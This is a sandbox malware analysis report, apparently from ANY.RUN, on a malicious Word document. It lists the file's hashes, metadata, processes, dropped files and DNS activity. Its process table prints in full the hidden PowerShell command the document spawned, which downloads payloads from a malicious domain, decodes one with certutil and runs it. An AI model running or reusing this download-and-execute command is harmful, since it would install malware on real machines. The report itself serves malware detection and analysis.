analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| File name: | 3d09914ba79809adf8b6f237db6f7eb65eb1e55284dcc85ce6ba811e5cf31d8e |
| Full analysis: | https://app.any.run/tasks/08313c97-4574-4483-ba6a-d0ceb35528ba |
| Verdict: | Malicious activity |
| Analysis date: | January 17, 2020, 19:51:55 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: user, Template: Normal.dotm, Last Saved By: Windows, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Jan 16 14:20:00 2020, Last Saved Time/Date: Thu Jan 16 14:20:00 2020, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
| MD5: | 2F874787735387FF671408ED1D661297 |
| SHA1: | CFAA57402AB33F0889A592D0EDBF042A67B53172 |
| SHA256: | 3D09914BA79809ADF8B6F237DB6F7EB65EB1E55284DCC85CE6BA811E5CF31D8E |
| SSDEEP: | 3072:k/s1dirz4eeVuDcu/nOmbiNT7ZlHS4RD2ygRn74Hq0ZdauVPZPpkigwAFI/WlLbp:Tdi/xtnuqND |
MALICIOUS
No malicious indicators.SUSPICIOUS
Executed via WMI
- powershell.exe (PID: 3280)
Creates files in the user directory
- powershell.exe (PID: 3280)
PowerShell script executed
- powershell.exe (PID: 3280)
Starts CertUtil for decode files
- powershell.exe (PID: 3280)
INFO
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 2128)
Creates files in the user directory
- WINWORD.EXE (PID: 2128)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .doc | | | Microsoft Word document (38.3) |
|---|---|---|
| .xls | | | Microsoft Excel sheet (alternate) (29.3) |
| .doc | | | Microsoft Word document (old ver.) (22.7) |
EXIF
FlashPix
| Title: | - |
|---|---|
| Subject: | - |
| Author: | user |
| Keywords: | - |
| Comments: | - |
| Template: | Normal.dotm |
| LastModifiedBy: | Пользователь Windows |
| RevisionNumber: | 2 |
| Software: | Microsoft Office Word |
| TotalEditTime: | - |
| CreateDate: | 2020:01:16 14:20:00 |
| ModifyDate: | 2020:01:16 14:20:00 |
| Pages: | 1 |
| Words: | - |
| Characters: | 1 |
| Security: | None |
| CodePage: | Windows Cyrillic |
| Company: | diakov.net |
| Lines: | 1 |
| Paragraphs: | 1 |
| CharCountWithSpaces: | 1 |
| AppVersion: | 15 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: | |
| HeadingPairs: |
|
| CompObjUserTypeLen: | 32 |
| CompObjUserType: | ???????? Microsoft Word 97-2003 |
Total processes
39
Monitored processes
3
Malicious processes
0
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 2128 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\3d09914ba79809adf8b6f237db6f7eb65eb1e55284dcc85ce6ba811e5cf31d8e.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
| 3280 | powershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://yestroy-bg.site/KeoiQ.dat,http://yestroy-bg.site/gkae.dat,http://yestroy-bg.site/QHsk.dat -Destination \"$env:TEMP\vido.com\",\"$env:TEMP\sfera\",\"$env:TEMP\QHsk.com\"; Set-Location -Path \"$env:TEMP\"; certutil -decode sfera dk; Start-Process vido.com -ArgumentList dk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
| 2308 | "C:\Windows\system32\certutil.exe" -decode sfera dk | C:\Windows\system32\certutil.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 2147942402 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
Total events
1 768
Read events
1 034
Write events
0
Delete events
0
Modification events
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2128 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA91B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3280 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1TB6N1RQ1A1SKKF1EEYW.temp | — | |
MD5:— | SHA256:— | |||
| 3280 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
| 3280 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39b3d9.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
| 2128 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:71834CB5A40FD067717E5E242FCFDDE2 | SHA256:053F9EECE736E49AA9E3C99DB635C70D83D2B9311D2D3CA8D612695DCF73376C | |||
| 2128 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$09914ba79809adf8b6f237db6f7eb65eb1e55284dcc85ce6ba811e5cf31d8e.doc | pgc | |
MD5:40C861EF8919E0EA633FDBE2717CD86E | SHA256:2451948A4DB5B2E892A46A04193485A94F5F82CE5B5F5B4D6F96C6EB2813623A | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
1
Threats
0
HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
DNS requests
Domain | IP | Reputation |
|---|---|---|
yestroy-bg.site |
| malicious |